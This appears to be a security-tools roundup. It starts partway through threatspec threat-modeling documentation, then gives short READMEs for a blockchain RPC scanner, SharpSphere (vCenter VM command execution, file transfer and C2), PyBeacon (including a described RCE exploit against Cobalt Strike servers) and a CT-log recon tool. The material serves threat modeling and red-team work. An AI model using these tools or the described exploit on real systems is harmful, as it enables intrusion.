# - 'path/to/repo1' # You can refer to other repositories or directories as needed
# - 'path/to/repo2' # ... and you can do this as much as you like
# - 'path/to/source/file.go' # You can directly reference source code files and directories
# - path: 'path/to/node_source' # You can also provide ignore paths for a path by providing a dictionary
# ignore: # Any sub-paths defined in this array are ignored as source files within the path are recursively parsed
# - 'node_modules'
# - path: 'path/to/config.py'
# mime: 'text/x-python' # You can explicitly set the mime type for files if needed


Step 3 - Annotate your source code with security concerns, concepts or actions
// @accepts arbitrary file writes to WebApp:FileSystem with filename restrictions
// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

Step 4 - Run threatspec against your source code
$ threatspec run
Running threatspec...

Threatspec has been run against the source files. The following threat mode file
has been created and contains the mitigations, acceptances, connections etc. for
the project:

threatmodel/threatmodel.json

The following library files have also been created:

threatmodel/threats.json threatmodel/controls.json threatmodel/components.json


Step 5 - Generate the threat model report
$ threatspec report
Generating report...
The following threat model visualisation image has been created: ThreatModel.md.png
The following threat model markdown report has been created: ThreatModel.md

Example report



See https://github.com/threatspec/threatspec_example_report.


Getting help

For more information, use the command line help flag.

$ threatspec --help
Usage: threatspec [OPTIONS] COMMAND [ARGS]...

threatspec - continuous threat modeling, through code

threatspec is an open source project that aims to close the gap between
development and security by bringing the threat modelling process further
into the development process. This is achieved by having developers and
...

Annotating your code

Supported file types

At the heart of threatspec there is a parser that reads source code files and processes any annotations found in those files. It uses a Python library called comment_parser to extract those comments. The comment_parser library determines the file's MIME type in order to know which type of comments need to be parsed. The supported file MIME types are:

Language       MIME String
C              text/x-c
C++/C#         text/x-c++
Go             text/x-go
HTML           text/html
Java           text/x-java-source
Javascript     application/javascript
Shell          text/x-shellscript
XML            text/xml

An unknown MIME type will result in a warning and the file will be skipped.

See https://github.com/jeanralphaviles/comment_parser for details.

In addition to these, threatspec will also soon parse the following files natively:

  • YAML
  • JSON
  • Plain text

If the MIME type for a file can't be determined, or if it is incorrect, you can override the MIME type for a path in the threatspec.yaml configuration file.
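To see why an override is sometimes needed, you can check what Python's stdlib would guess for a given path (note that comment_parser's own detection mechanism may differ from this):

```python
import mimetypes

def mime_for(path: str):
    """Guess a file's MIME type from its extension; returns None if unknown."""
    mime, _encoding = mimetypes.guess_type(path)
    return mime

# Files whose extension is unknown to the guesser are the ones that need an
# explicit 'mime:' entry in threatspec.yaml.
```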


Comment types

There are four main comment types supported by threatspec.


Single-line

Single-line comments are the most common use-case for threatspec, as they allow you to capture the necessary information as close as possible to the code. An example would be:

// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions
func (p *Page) save() error {

Multi-line

If you want to capture multiple annotations in the same place, you could use multiple single-line comments. But you can also use multi-line comments instead:

/*
@accepts arbitrary file writes to WebApp:FileSystem with filename restrictions
@mitigates WebApp:FileSystem against unauthorised access with strict file permissions
*/
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

More importantly, if you want to use the extended YAML syntax (see below), you'll need to use multi-line comments:

/*
@mitigates WebApp:FileSystem against unauthorised access with strict file permissions:
description: |
The file permissions 0600 is used to limit the reading and writing of the file to the user and root.
This prevents accidental exposure of the file content to other system users, and also protects against
malicious tampering of data in those files. An attacker would have to compromise the server's user
in order to modify the files.
*/
func (p *Page) save() error {
filename := p.Title + ".txt"
return ioutil.WriteFile(filename, p.Body, 0600)
}

Inline

You can add comments to the end of lines that also contain code. This can be useful, but might result in rather long lines, so it's probably best to use these for @review annotations.

        err = ioutil.WriteFile("final-port.txt", []byte(l.Addr().String()), 0644) // @review WebApp:Web Is this a security feature?

YAML and JSON

Finally, the last comment type isn't really a comment at all. Rather, it's additional keys in JSON or YAML data files using the x-threatspec extension key. This was primarily chosen to be compatible with OpenAPI/Swagger files but might work in other circumstances. The rest of the threatspec annotation is essentially the same. So a very simple example would be something like:

servers:
- url: http://petstore.swagger.io/v1
x-threatspec: "@exposes Petstore:Web to Man in the Middle (#mitm) with lack of TLS"

A more complete example using the extended syntax just uses the threatspec annotation as a key:

    post:
summary: Create a pet
operationId: createPets
tags:
- pets
x-threatspec:
"@exposes Petstore:Pet:Create to Creation of fake pets with lack of authentication":
description: "Any anonymous user can create a pet because there is no authentication and authorization"

Summary of annotations

Here is a quick summary of each supported annotation type. For a full description, see the Annotations section below.

  • @component - a hierarchy of components within the application or service.
    Example: @component MyApp:Web:Login
  • @threat - a threat.
    Example: @threat SQL Injection (#sqli)
  • @control - a mitigating control.
    Example: @control Web Application Firewall (#waf)
  • @mitigates - a mitigation against a particular threat for a component, using a control.
    Example: @mitigates MyApp:Web:Login against Cross-site Request Forgery with CSRF token generated provided by framework
  • @exposes - a component is exposed to a particular threat.
    Example: @exposes MyApp:CICD:Deployment to rogue code changes with lack of separation of duty
  • @accepts - the acceptance of a threat against a component as unmitigated.
    Example: @accepts #api_info_diclosure to MyService:/api with version information isn't sensitive
  • @transfers - a threat is transferred from one component to another.
    Example: @transfers auth token exposed from MyService:Auth:#server to MyService:Auth:#client with user must protect the auth token
  • @connects - a logical, data or even physical connection from one component to another.
    Example: @connects MyService:Product:Search to MyService:Product:Basket with Add selected product to basket
  • @tests - the test of a control for a component.
    Example: @tests CSRF Token for MyService:Web:Form
  • @review - a note for a component to be reviewed later.
    Example: @review Web:Form Shouldn't this mask passwords?

Custom data using YAML

Threatspec now supports an extended syntax which uses YAML. This allows you to provide additional data that can then be used in reports, or any other processing of the JSON files. There is one special description field that is supported by default and is used by the default reporting if provided. As in the above example, you can use description to provide any additional context using a multi-line comment:

/*
@mitigates WebApp:FileSystem against unauthorised access with strict file permissions:
  description: |
    The file permission 0600 is used to limit the reading and writing of the file to the user and root.
    This prevents accidental exposure of the file content to other system users, and also protects against
    malicious tampering of data in those files. An attacker would have to compromise the server's user
    in order to modify the files.
*/
func (p *Page) save() error {
    filename := p.Title + ".txt"
    return ioutil.WriteFile(filename, p.Body, 0600)
}

You can also add any other data fields you like, which can then be used in custom reports. For example:

/*
@exposes WebApp:App to XSS injection with insufficient input validation:
  description: An attacker can inject malicious javascript into the web form
  impact: high
  owner: Engineering
  ref: #TRACKER-123
*/

func editHandler(w http.ResponseWriter, r *http.Request, title string) {
    p, err := loadPage(title)
    if err != nil {
        p = &Page{Title: title}
    }
    renderTemplate(w, "edit", p)
}

Ways of capturing information

There are two main use-cases for using threatspec, and so threatspec can be used in a couple of different ways.


Capturing key information in the moment while writing code

The first use-case is as a developer (or other engineer) writing code, and wanting to capture security context such as possible threats, decisions, questions, assumptions etc. As you're in the middle of writing code, you might not have the full big-picture context immediately available, but you want to quickly capture important information there and then, with minimal effort. Threatspec does this by keeping you in the IDE, thereby minimising context switching and delays.

The free-text style of threatspec annotations is ideally suited for this case. Let's say you are writing a database query and are using parameterised queries. It's possible that you're doing this simply because you've been told it's best practice. But you're clever and you know it's best practice because it helps to mitigate against threats like SQL injection. Without having the full context in your head, you quickly write the comment:

// @mitigates MyApp:Web:Backend against SQL Injection with use of parameterised queries

You've now captured a very important security decision, with minimal effort. This can now be displayed in the much wider context by generating a report. What threatspec does when it parses your comment is turn each of the elements into identifiers. You don't have to know about these identifiers right now, as you're just capturing key information.

For example, the SQL Injection threat above would have the identifier #sql_injection. Now, if somewhere else in your project somebody has already created a SQL injection threat, but they used the identifier #sqli then that's fine. There will be some duplication, but you can quickly spot that in the report and iterate to reduce the duplications. But most importantly, you capture the necessary information in a meaningful and efficient way. The big-picture view will naturally emerge and evolve over time with the code base.


Capturing data in structured threat modeling sessions

The other use case for threatspec is as a way to capture information in threat modeling sessions. Let's say you get together as a team before starting work on a new feature. This threat modeling session will serve as a design and architecture session as well as for thinking about threats. You'll probably start off sketching designs and architectures on a whiteboard, and so you'll want to start capturing key components as they're discussed. Threatspec lets you do this in any IDE, just by using a plaintext file:

@component External:User (#user)
@component MyApp:Web:LoadBalancer (#lb)
@component MyApp:Web:WebServer (#web)
@component MyApp:API:Product (#product_api)
@component MyApp:API:Users (#users_api)

Running threatspec report at this stage will already generate a visual hierarchy of the components. You'll probably want to make logical, data flow or other connections between the components as well. So you might capture something like:

@connects #user to #lb with HTTPS
@connects #lb to #web with HTTPS
@connects #user to #product_api with Product Search
@connects #user to #users_api with User Management

Now that a bit of an architecture or data flow is starting to emerge, it's probably a good time to start thinking about potential threats. As this is a structured session, it's a great opportunity to write the threats in a more structured way that can evolve into a library of threats. Capturing the threats in the same file might look something like this:

# Threats

@threat Authentication Info Disclosure (#auth_info_disclosure):
  description: An attacker can obtain information about existing users of the system

@threat Expensive Query Denial of Service (#query_dos):
  description: |
    An attacker can submit many queries that are expensive for the backend service to run,
    resulting in a denial of service for that service.

# Exposures

@exposes #users_api to #auth_info_disclosure with broken role based access control:
  description: |
    If the authentication and authorization model is broken, an attacker might be able to
    retrieve information about other users from the Users API.

@exposes #product_api to #query_dos with suboptimal product search query:
  description: The way product queries are done is inefficient and a large number could easily take down the service.

Running threatspec report now will start to look like a traditional threat model document. The difference is that as you start adding to your code base, you can start moving the annotations to the relevant code classes and functions so that the threat model continues to stay in sync. And if the architecture changes, that's no problem either. The generated report will always reflect what has been documented in the code.


Skipping annotations

To stop an annotation from being parsed and reported on, you can put a string in front of the annotation tag. Any string will do, but we suggest using the word @skip so it's easy to search for.

// @skip @transfers @cwe_319_cleartext_transmission from WebApp:Web to User:Browser with non-sensitive information
func main() {

Running threatspec

So far we've looked at how threatspec can be embedded within source files. This section looks at how threatspec can be used within code repositories and even across repositories.


In a single repository

When you first use threatspec, you'll likely initialise it in a code repository that you're just starting or have already been working on, rather than creating a new repository specifically for threatspec. This allows you to quickly get started with using threatspec in an evolving code base. Using the threatspec.yaml configuration file you can tweak how the various paths within the repository are processed.


Across multiple repositories

As your code base or use of threatspec grows, you may need to generate the bigger threat modeling picture from multiple repositories. These could be different repositories for the same application, but could also be entirely different applications. Or, a mixture of application and infrastructure deployment repositories. At this stage you may want to create a new repository specifically for threatspec that has a configuration file that points to various other repositories. When threatspec processes the imports section of the configuration file, it loads the threat model and library files from each import path. This allows you to "glue" multiple repositories together into a single view.

Let's say you had the following repositories, each containing a threatspec.yaml file and annotations within their source files:

  • src/myapp-api
  • src/myapp-web
  • src/myapp-deployment
  • src/auth-service

In this example, auth-service would be a service shared across the organisation. You could create a new repository called src/myapp-threatmodel containing the following threatspec.yaml file:

project:
  name: MyApp
  description: My Application Service
imports:
  - ../myapp-api
  - ../myapp-web
  - ../myapp-deployment
  - ../auth-service
paths:
  - ./

Running threatspec in the myapp-threatmodel repo would generate a threat model report across the entire MyApp code base, but also including the auth service.


Generating reports

Report generation in threatspec is there to allow you to take a step back and look at the wider context. This allows the bigger picture to naturally and organically emerge from the more day-to-day tactical decisions and assumptions. There's no fixed point at which you have to generate the report, but some suggestions are:

  • Generating it locally on your development machine as a sense-check after adding in new annotations
  • Automatically generating documentation and therefore the threat model report as part of a CI/CD pipeline
  • Prior to a team or multi-team threat modeling session
  • As part of an architecture review process
  • As input into an AppSec process such as internal pentesting or code review

The default report

The default report aims to provide a visual context as well as the details. It does this by generating a visualisation of the components, threats and controls in the form of a graph. It also provides tables of the threats, connections and reviews. This is all packaged up as a Markdown document. If you'd like to generate a PDF of the report, we suggest you use your browser's Print to PDF feature.


Other reports

There are a couple of other basic report formats supported by threatspec.


Text report

There is a basic text report which provides a summary as a basic ASCII text file.


JSON report

There is also a json report that will generate a single JSON file for all of the mitigations, exposures etc. and all of the threats, controls and components that are in scope. The source data files are merged together for simpler processing. For example, where an object originally referenced a control by its identifier, that key now points to a copy of the whole control object. This saves having to cross reference data.

You can use the JSON report file to create whatever custom visualisation or report as you see fit. Examples include:

  • Writing a script to parse the JSON file and insert the data into another data store (e.g. a database or JIRA)
  • Writing a simple CI/CD gate script that breaks the build under certain conditions like too many exposures
  • Building your own custom visualisation or reporting tool
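For instance, a minimal CI/CD gate along the lines of the second bullet might look like the sketch below. The report structure (a top-level "exposures" list) is an assumption for illustration; check the actual JSON report your threatspec version produces before relying on specific keys.

```python
import json
import sys

# Hypothetical gate script: fail the build if the threat model report
# carries more unmitigated exposures than we are willing to accept.
MAX_EXPOSURES = 5

def count_exposures(report):
    # Assumes a top-level "exposures" list; adjust to the real report schema.
    return len(report.get("exposures", []))

def gate(report, limit=MAX_EXPOSURES):
    exposures = count_exposures(report)
    if exposures > limit:
        print(f"FAIL: {exposures} exposures exceeds limit of {limit}")
        return 1
    print(f"OK: {exposures} exposures within limit of {limit}")
    return 0

if __name__ == "__main__":
    # Usage: python gate.py ThreatModel.json
    with open(sys.argv[1]) as f:
        sys.exit(gate(json.load(f)))
```

A non-zero exit code makes most CI systems mark the stage as failed, so the script can be dropped straight into a pipeline step after report generation.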

Custom reports

The reporting system in threatspec uses the Python Jinja2 templating library. It also allows you to specify your own template file directly from the command line using the template output option. This allows you to easily create custom reports in whatever text format you need, without having to code something from scratch. The data that is made available to the template is the same as you get by running the json report, and it is passed in using the report variable. A very simple custom report might look like:

*******************************************************************************
{{ report.project.name }} Threat Model
*******************************************************************************

{{ report.project.description }}

See http://jinja.pocoo.org/ for more information on the Jinja2 templating library.


Annotations

Threatspec is based around annotating code with security related concepts. The code could be traditional application source code, but also Infrastructure-as-code. Comments are used at the point where the threat is most relevant, and by annotating the code you keep the threat model closest to the source - especially in a world of everything-as-code. This results in a living, evolving threat model document that plays well with existing software engineering practices such as Agile, Lean, code peer review, continuous testing and continuous deployment.


Threats

As you can imagine, a lot of threat modeling involves talking about threats. In the context of threat modeling, a threat is simply something that could go wrong. We typically focus on cyber security threats to technical systems, but not necessarily. In threatspec, a threat is basically just a string or an identifier to a string (see the Identifiers section below). Documented threats are stored in threat library JSON files and can be used across the code. In fact, it's sensible to build libraries of threats that can be shared across projects within your organisation, or even released as open source for others to use.

A threat in threat modeling isn't the same thing as a vulnerability. You cannot have a vulnerability in an application that only exists as a whiteboard drawing, but you can sensibly talk about possible threats to that application. Essentially, a vulnerability is a materialised threat. Threat modeling, and threatspec in particular, can help add context to other Application Security (AppSec) processes.


Controls

Threats are preferably mitigated in some way, and this typically involves implementing a technical control. Of course, in a threat modeling session, you'll probably be talking about which potential controls can be used to mitigate against different threats. As part of the general brainstorming process, you might want to capture a range of different possible controls of varying complexity and effectiveness. In threatspec, you might well be implementing a control in the code that you're writing, simply by following secure coding best practices. As with threats, controls are just strings or identifiers.


Components

Components are the basic building blocks of your application or service. Whether you're looking at things from an architecture perspective, or as a data flow, components are the different bits that are somehow related and connected. Threatspec doesn't require you to interpret components in any particular way, so a single threat model can combine a mix of architectural components, data flow processes, even elements of a user interface.

Hierarchy is achieved by separating related components using the colon character (":"). You can nest however deeply you need, and components can appear at any point in the hierarchy. It only really has to make sense in the context of your application or service, and your organisation.

Here's what a typical web user interface component might look like: MyApp:Web:LoginForm. Within the MyApp application, we have a Web component that contains a LoginForm. See the examples below for many more examples.

There are two special components which are particularly useful for threat modeling APIs. One of the challenges of APIs and microservices is that you don't always know the full architecture in advance. The #server and #client special components let you refer to any current or future client of a server, without committing to the client being in any particular part of the architecture. For an example, see the "Transfers" section below.

Finally, components bring with them a challenge of identity. How do we know that the database component in MyApp:Product:Database is the same thing as the database component in MyApp:Users:Database? Threatspec assumes that they're different by default, because it generates a component ID using the full path. If they are in fact actually the same thing, you can state that by putting the primary component (the preferred way of referring to it) in parentheses after the alternative path. For example, MyApp:Product:Database and MyApp:Users:Database (MyApp:Product:Database) both refer to the same Database component.


Identifiers

Identifiers are shorthand ways of referring to unique threats, components or controls (which we'll refer to as library objects). When parsing annotations, threatspec generates an ID for each new library object, and if the ID isn't known, it adds the new object to the respective library. You can also refer directly to the library object using the ID. To do this, you can specify an explicit ID by putting it in parentheses. For example, you can reference the threat SQL Injection (#sqli) simply as #sqli instead of SQL Injection.
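The exact normalisation threatspec applies when generating an ID is internal to the tool, but the idea can be sketched as lowercasing the name, collapsing non-alphanumeric runs to underscores, and prefixing with "#". The helper below is illustrative only; threatspec's real rules may differ in detail.

```python
import re

# Illustrative sketch of deriving an identifier from a free-text name,
# e.g. "SQL Injection" -> "#sql_injection".
def make_identifier(name):
    # Lowercase, collapse non-alphanumeric runs to underscores, trim, prefix.
    slug = re.sub(r"[^a-z0-9]+", "_", name.lower()).strip("_")
    return "#" + slug

print(make_identifier("SQL Injection"))  # "#sql_injection"
```

This also explains the duplication mentioned earlier: "SQL Injection" and a hand-written "#sqli" normalise to different IDs, so they show up as separate threats until someone consolidates them.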


Mitigates

A mitigation reduces the potential impact or likelihood of a threat to a component. This is generally implemented as a technical control. In threat modeling we can talk about potential mitigations against hypothetical threats, and in threat-modeling-as-code we can document specific coding practices, libraries or architecture decisions as mitigations against a particular threat. For example, you might mitigate a SQL injection threat by using parameterised queries.

Pattern: @mitigates (?P<component>.*?) against (?P<threat>.*?) with (?P<control>.*)

Examples:

  • @mitigates MyApp:Web:Login against Cross-site Request Forgery with CSRF token generated provided by framework
  • @mitigates MyAPI:/ against DoS through excessive requests with use of a load balancer
  • @mitigates MyService:Crypto:Keys against weak key material with use of a secure random number generator (#PRNG)
// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions
func (p *Page) save() error {
    filename := p.Title + ".txt"
    return ioutil.WriteFile(filename, p.Body, 0600)
}
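The pattern above is a standard Python regular expression, so parsing a line can be sketched directly with the stdlib re module. This mirrors the documented pattern; threatspec's own parser may do more.

```python
import re

# The @mitigates pattern, exactly as documented above.
MITIGATES = re.compile(
    r"@mitigates (?P<component>.*?) against (?P<threat>.*?) with (?P<control>.*)"
)

line = "// @mitigates WebApp:FileSystem against unauthorised access with strict file permissions"
m = MITIGATES.search(line)
print(m.group("component"))  # WebApp:FileSystem
print(m.group("threat"))     # unauthorised access
print(m.group("control"))    # strict file permissions
```

The lazy quantifiers (.*?) are what let the component and threat stop at the first " against " and " with " keywords, while the final greedy group takes the rest of the line as the control.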

Accepts

Some threats are perceived to be relatively insignificant and therefore don't really need to be mitigated. In this case you can accept the threat. You might choose to simply ignore the threat and not even document it, but it's still worth keeping a level of visibility for accepted threats. This is because a number of smaller seemingly insignificant threats can actually pose a significant compound threat, so making these visible in threat modeling sessions is always worth it. You can of course always accept even a significant threat, possibly due to feature delivery pressures, and keeping these visible helps to highlight the growing cyber security debt your application or service is carrying.

Pattern: @accepts (?P<threat>.*?) to (?P<component>.*?) with (?P<details>.*)

Examples:

  • @accepts file is read by system users to MyApp:Configuration with only admin users have system access
  • @accepts data breach of publicly available information to MyApp:AWS:S3:CustomerData with low chance of bucket is discovered by attacker
  • @accepts #api_info_diclosure to MyService:/api with version information isn't sensitive
// @accepts arbitrary file reads to WebApp:FileSystem with filename restrictions
func loadPage(title string) (*Page, error) {
    filename := title + ".txt"
    body, err := ioutil.ReadFile(filename)
    if err != nil {
        return nil, err
    }
    return &Page{Title: title, Body: body}, nil
}

Transfers

Threats can be transferred from one component to another, typically because the new component mitigates the threat in some way. A classic example of this would be transferring the threat of SQL injection from the web application to a Web Application Firewall (WAF). Technically the threat hasn't gone away, but the WAF is now responsible for mitigating it, and probably (hopefully?) does so using clever technology.

Another interesting use case for transfers is where a particular service component will do its job mitigating against certain threats, but isn't in a position to mitigate all threats. Some threats must be mitigated by users of the service. For example, a web service might securely store user credentials in the backend, but the user is also responsible for not disclosing their credentials. The threat of accidental exposure of credentials is mitigated by the service, but also transferred to the client.

Pattern: @transfers (?P<threat>.*?) from (?P<source_component>.*?) to (?P<destination_component>.*?) with (?P<details>.*)

Examples:

  • @transfers #sqli from MyApp:Web to #WAF with use of WAF data validation
  • @transfers auth token exposed from MyService:Auth:#server to MyService:Auth:#client with user must protect the auth token
  • @transfers sensitive data disclosure from MyApp:AWS:S3:Bucket to MyApp:AWS:BucketPolicy with use of bucket policy to restrict access
// @transfers @cwe_319_cleartext_transmission from WebApp:Web to User:Browser with non-sensitive information
func main() {
    flag.Parse()
    http.HandleFunc("/view/", makeHandler(viewHandler))
    http.HandleFunc("/edit/", makeHandler(editHandler))
    http.HandleFunc("/save/", makeHandler(saveHandler))

    if *addr {
        l, err := net.Listen("tcp", "127.0.0.1:0")

Exposes

If a threat isn't mitigated, transferred or accepted, it's basically left exposed. This should be the default state for new threats, until a decision has been made on what to do with them. Note that an exposed threat modeling threat doesn't necessarily equate to a vulnerability, but it highlights where you might expect to find them.

Pattern: @exposes (?P<component>.*?) to (?P<threat>.*?) with (?P<details>.*)

Examples:

  • @exposes Web:Form to #XSS with lack of input validation
  • @exposes MyService:Basket to price tampering with lack of backend validation
  • @exposes MyApp:CICD:Deployment to rogue code changes with lack of separation of duty
// @exposes WebApp:App to XSS injection with insufficient input validation
func editHandler(w http.ResponseWriter, r *http.Request, title string) {
    p, err := loadPage(title)
    if err != nil {
        p = &Page{Title: title}
    }
    renderTemplate(w, "edit", p)
}

Connects

The relationship between components in a hierarchy are inferred from the component naming convention (see Components below). If you want to explicitly document connectivity between components, you can do this with the @connects tag. This allows you to draw architecture diagrams or data-flow diagrams, even before a single line of actual code has been written.

Pattern: @connects (?P<source_component>.*?) (?P<direction>with|to) (?P<destination_component>.*?) with (?P<details>.*)

Examples:

  • @connects User:Browser to MyApp:Web:Nginx with HTTPS/TCP/443
  • @connects MyService:Product:Search to MyService:Product:Basket with Add selected product to basket
  • @connects MyService:AWS:S3 with MyService:AWS:S3BucketPolicy with policy enforcement
// @connects User:Browser to MyService:Product:View with category
// @connects MyService:Product:View to MyService:Product:Search with search by category
// @connects MyService:Product:Search to MyService:Product:View with list of products
// @connects MyService:Product:View to User:Browser with table of products by category
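The direction alternation in the @connects pattern can be exercised the same way as the other patterns, using Python's stdlib re module (a sketch mirroring the documented pattern):

```python
import re

# The @connects pattern as documented above, including the with|to direction group.
CONNECTS = re.compile(
    r"@connects (?P<source_component>.*?) (?P<direction>with|to) "
    r"(?P<destination_component>.*?) with (?P<details>.*)"
)

m = CONNECTS.search("@connects User:Browser to MyApp:Web:Nginx with HTTPS/TCP/443")
print(m.group("direction"))              # to
print(m.group("destination_component"))  # MyApp:Web:Nginx
print(m.group("details"))                # HTTPS/TCP/443
```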

Tests

Identifying threats is great. Identifying mitigations against those threats is better. Implementing those mitigations is even better. Testing that those mitigations work, well that's just amazing. This action allows you to comment which unit or integration code is testing a particular control. This helps you to ensure the mitigations are working as expected and makes that visible in the threat model. These can also act as security regression tests, to prevent previously fixed threats returning. It's worth noting that writing tests which validate the control behaviour directly is great, but you might also want to consider how you could write offensive tests that fail as a result of the control. This can help bridge the gap where the control is working as expected, but where another factor has resurfaced the threat.

Pattern: @tests (?P<control>.*?) for (?P<component>.*)

Examples:

  • @tests CSRF Token for MyService:Web:Form
  • @tests Strict File Permissions for MyApp:Config
  • @tests #PRNG for Web:Auth
// @tests SecureRandom for App:Crypto:Certificates
def test_prng_entropy():
    prng = crypto.SecureRandom()

Review

Threat modeling in code, especially unfamiliar code, can at times look a bit like a code review. If you're not the one who is writing or has written the code, questions may crop up that are worth flagging in a threat modeling session. You can use the @review tag to simply highlight a question or possible concern to be reviewed or discussed later.

Pattern: @review (?P<component>.*?) (?P<details>.*)

Examples:

  • @review Web:Form Shouldn't this mask passwords?
  • @review MyService:Auth this might not be a secure crypto algorithm in this situation
  • @review MyApp:Database Where do these credentials come from?
// @review MyService:Web Shouldn't this be using TLS?
http.ListenAndServe(":8080", nil)


Teatime - An RPC Attack Framework For Blockchain Nodes



Teatime is an RPC attack framework aimed at making it easy to spot misconfigurations in blockchain nodes. It detects a large variety of issues, ranging from information leaks to open accounts, and configuration manipulation.

The goal is to enable tooling that scans for vulnerable nodes and minimizes the risk of node-based attacks due to common vulnerabilities. Teatime uses a plugin-based architecture, so extending the library with your own checks is straightforward.

Please note that this library is still a PoC and lacks documentation. If there are plugins you would like to see, feel free to contact me on Twitter!


Installation

Teatime runs on Python 3.6+.

To get started, simply run

$ pip3 install teatime

Alternatively, clone the repository and run

$ pip3 install .

Or directly through Python's setuptools:

$ python3 setup.py install

Example

To get started, simply instantiate a Scanner class and pass in the target IP, port, node type, and a list of instantiated plugins. Consider the following sample to check whether a node is synced and mining:

from teatime.scanner import Scanner
from teatime.plugins.context import NodeType
from teatime.plugins.eth1 import NodeSync, MiningStatus

TARGET_IP = "127.0.0.1"
TARGET_PORT = 8545
INFURA_URL = "Infura API Endpoint"

def get_scanner():
    return Scanner(
        ip=TARGET_IP,
        port=TARGET_PORT,
        node_type=NodeType.GETH,
        plugins=[
            NodeSync(infura_url=INFURA_URL, block_threshold=10),
            MiningStatus(should_mine=False)
        ]
    )

if __name__ == '__main__':
    scanner = get_scanner()
    report = scanner.run()
    print(report.to_dict())

Check out the examples directory for more small samples! Teatime is fully typed, so also feel free to explore options in your IDE if reading the documentation is not your preferred choice. :)


Future Development

The future of Teatime is uncertain, even though I would love to add broader checks that go beyond RPC interfaces, specifically for technologies such as:

  • Ethereum 2.0
  • Filecoin
  • IPFS

If you want to integrate plugins for smaller, less meaningful chains such as Bitcoin or Ethereum knock-offs, feel free to fork the project and integrate them separately.



SharpSphere - .NET Project For Attacking vCenter



SharpSphere gives red teamers the ability to easily interact with the guest operating systems of virtual machines managed by vCenter. It uses the vSphere Web Services API and exposes the following functions:

  • Command & Control - In combination with F-Secure's C3, SharpSphere provides C&C into VMs using VMware Tools, with no direct network connectivity to the target VM required.
  • Code Execution - Allows arbitrary commands to be executed in the guest OS and returns the result
  • File Upload - Allows arbitrary files to be uploaded to the guest OS
  • File Download - Allows arbitrary files to be downloaded from the guest OS
  • List VMs - Lists the VMs managed by vCenter that have VMware Tools running

SharpSphere supports execution through Cobalt Strike's execute-assembly.


Compilation

Compiled versions can be found here.

If you compile yourself you'll need to use ILMerge to combine SharpSphere.exe and CommandLine.dll in the Releases folder.


Usage

Available modules:

SharpSphere.exe help


list List all VMs managed by this vCenter

execute Execute given command in target VM

c2 Run C2 using C3's VMwareShareFile module

upload Upload file to target VM

download Download file from target VM

help Display more information on a specific command.

version Display version information.


List VMs:
SharpSphere.exe list --help 

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

Code execution:
SharpSphere.exe execute --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--command Required. Command to execute

--output (Default: false) Flag to receive the output. Will create a temporary file in C:\Users\Public on the
guest to save the output. This is then downloaded and printed to the console and the file deleted.

Command & Control:
SharpSphere.exe c2 --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--localdir Required. Full path to the C3 directory on this machine

--guestdir Required. Full path to the C3 directory on the guest OS

--inputid Required. Input ID configured for the C3 relay running on this machine

--outputid Required. Output ID configured for the C3 relay running on this machine

File Upload:
SharpSphere.exe upload --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--source Required. Full path to local file to upload

--destination Required. Full path to location where file should be uploaded

File Download:
SharpSphere.exe download --help

--url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

--username Required. vCenter username, i.e. administrator@vsphere.local

--password Required. vCenter password

--ip Required. Target VM IP address

--guestusername Required. Username used to authenticate to the guest OS

--guestpassword Required. Password used to authenticate to the guest OS

--source Required. Full path in the guest to the file to download

--destination Required. Full path to the local directory where the file should be downloaded

Future Features
  1. Add support for Linux guest OS
  2. Include a --verbose option for listing VMs
  3. Add a --quiet flag to not mention every packet that's transferred
  4. Add a --testauth flag to confirm guest credentials are valid

Credit @jkcoote & @grzryc

Full walk-through and examples available here.




PyBeacon - A Collection Of Scripts For Dealing With Cobalt Strike Beacons In Python



PyBeacon is a collection of scripts for dealing with Cobalt Strike's encrypted traffic.

It can encrypt/decrypt beacon metadata, as well as parse symmetrically encrypted taskings.


Scripts included

There is a small library which includes encryption/decoding methods, and some example scripts are included.

  • stager-decode.py - this tool will simply decode a beacon DLL from a stager URL (you can use it to extract the public key).
  • register.py - this tool deals with RSA encrypted metadata and can register a new (fake) beacon on a target Teamserver.
  • tasktool.py - this tool deals with AES encrypted taskings to/from the teamserver. Use it to send callbacks to the teamserver, or for decoding taskings from a Teamserver to the beacon.
  • cs-3-5-rce.py - This is an implementation of the exploit used to exploit CS < 3.5-hf1, which was used in the wild to hack Cobalt Strike servers. It works by registering a beacon with a directory traversal in the IP address field. It then subsequently registers a download callback which causes the "download" to be uploaded anywhere on the target file system. The ITW exploit used a cronjob to achieve RCE.

TODO
  • Add more task types to the task decoding logic
  • Add decoding for beacon taskings. At the moment some "generic" logic is used, but it's not really helpful


CertEagle - Asset monitoring utility using real time CT log feeds



In bug bounties, “if you are not first, then you are last”: there is no such thing as a silver or bronze medal. Recon plays a crucial part, and if you can detect a newly added asset earlier than others, your chances of finding and reporting a security flaw on that asset, and getting rewarded for it, are higher.

Personally, I have been monitoring CT logs for domains/subdomains for quite a long time now, and it has given me a lot of successful results. The inspiration behind this was Sublert (by yassineaboukir), which checks crt.sh for subdomains and can be executed periodically. However, I use a somewhat different approach: instead of polling crt.sh periodically, I extract domains from live CT log feeds, so my chances of finding a new asset early are higher.


Detailed Description about this can be found here :

Read Blog here : https://medium.com/@Asm0d3us/weaponizing-live-ct-logs-for-automated-monitoring-of-assets-39c6973177c7


Workflow
